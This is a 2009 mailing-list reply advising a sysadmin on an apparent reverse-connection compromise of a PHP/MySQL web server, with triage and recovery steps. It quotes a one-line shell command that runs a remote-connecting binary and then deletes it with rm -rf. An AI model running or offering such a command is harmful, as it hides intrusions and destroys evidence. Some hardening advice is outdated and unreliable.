Re: found clues about a security issue in a web server

[Aarón Mizrachi <unmanarc () gmail com>]

On Domingo 15 Marzo 2009 11:40:22 kazabe escribió:
> Hi.
>
> In the latest week my internet connection was frozen.   After discard
> ISP and routing problems, i see this process in my webserver (stored
> behind my router):
>
> www-data   20580   00   00   815    355   ?   S    07:16    6:01
> ./s    86.23.114.12  80
>
> that process was using all the bandwith (the address displayed is a
> remote IP, without any relationship with us).  After kill that
> process, the internet service is normal again.  The router and the
> webserver are running under Debian Lenny.  The web server is not
> remotely accesible.  all the administration is phisically in the PC.
> The webserver dont have any remote access (dont have ftp, or ssh, or
> telnet.  Nothing).
>
> I try to found that "./s" but i cant found it yet.    How can i detect
> how was inyected that script?

Hi, sounds like Scripting bad code explotation (PHP, JSP, Perl, etc...)

Why?

running ./s as www-data sounds like reverse connection started with apache 
user, that are probable to happen on scripting explotation attacks.

More if you say that the only internet-open port are the webserver.
------------------------------------------------------

> The webserver is only to publish a website related with company
> internal process (but is published to Internet, by a port forwarding
> from the router).   That website use php and mysql.
>
> What can i check to solve that security issue?
>
> Thanks in advance.


That security issue happen's  by a bad-programmed script code, first of all, 
what script code are installed on your server (php, jsp, mono asp.net, perl, 
cgi-bin, etc)? 

If it's a CMS, are properly updated?

Each language are a bit different from each other..., Ex. on php, "safe_mode 
on" are mandatory on security matter, "url_fopen off" are mandatory to prevent 
RFI... 

Don't use or activate anything that you dont really use... if you dont use 
cgi-bin, DISABLE IT. 

-------------------------------------------------
location of s.

check on /tmp
check on www-data writeable dirs

but remember, s could be deleted when you kill him, a simple bash sentence 
demostrate that:

(./s    86.23.114.12  80; rm -rf ./s)

Then when you kill s, the rm -rf act... and bye bye to s.

---------------------------------------------------
Scope:

That ps line prove that a hacker have the REMOTE control of a user-shell on 
your server, that is sufficiently bad, you could have trojans/rootkits. (Dont 
even think about your firewalls, doesn't protect you on reverse connections)

More worse scenario involves root compromise and other system's compromise 
over network using mitm, etc... 

---------------------------------------------------
Sugerency:

- Down your portal
- Check your apache logs (/var/log/www or similar). 
- Check for rootkits
- Check for 
- Create a hard-drive image (http://dcfldd.sourceforge.net/)
- Reinstall (please check if your linux distro are currently mantained, its so 
important...)
- Do a server security hardening
- Check for updates and enable auto-updates
- Audit your code (PHP or something), update everything hand-updeteable like 
CMS, etc
- Audit your FS permisology (chown and chmod are your best friend)
- Up your portal
- Weekly reboot your server (uptime are the best enemy of security)



;-)


------------------------------------------------------------------------
This list is sponsored by: InfoSec Institute

Find the source of cybercrime! Almost every crime today involves a computer or mobile device. Learn how to become a 
Computer Forensics Examiner in InfoSec Institute's hands-on Computer Forensics Course. Up to three industry recognized 
certs available, online computer forensics training available.

http://www.infosecinstitute.com/courses/computer_forensics_training.html
------------------------------------------------------------------------